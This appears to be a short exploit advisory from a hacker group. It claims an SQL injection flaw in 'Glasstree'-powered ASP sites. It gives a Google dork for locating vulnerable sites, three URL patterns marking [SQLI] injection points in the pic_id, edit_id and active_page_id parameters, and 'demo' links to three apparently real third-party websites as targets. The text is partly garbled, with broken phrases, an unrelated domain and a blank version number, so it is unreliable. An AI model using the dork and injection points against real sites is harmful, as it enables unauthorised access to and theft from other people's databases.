# Exploit Title: Glasstree <= SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com | Caddy-Dz@exploit-id.com
# Category: webapps
# Google Dork: intext: "powered by Glasstree.com" inurl:. asp? =
# Tested on: [Windows Vista Edition Int é grale]
####
[*] # Explain! T:
# Http://www.bkjia.com/#.asp? Pic_id = [SQLI]
# Http://www.bkjia.com/#.asp? Edit_id = [SQLI]
# Http://www.bkjia.com/#.asp? Active_page_id = [SQLI]
###
[*] Demo:
Http://www.andyponstein.com/photos.asp? Pic_id = 3
Http://www.frazierracing.com/photo.asp? Pic_id = 13
Http://www.sweetmfg.biz/products3.asp? Edit_id = 50
###
[*] Peace From Algeria
###
===================================== ** Algerians Hackers ** = ==============================================
# Greets:
KedAns-Dz & ** All Algerians Hackers **, jos_ali_joe, All Exploit-Id Team, (exploit-id.com)
(1337day.com), (09exploit.com), All My Friends: T! RiRou, ChoK0, MeRdaw! , CaRras0, StiffLer,
MaaTar, St0fa, Nissou, RmZ... others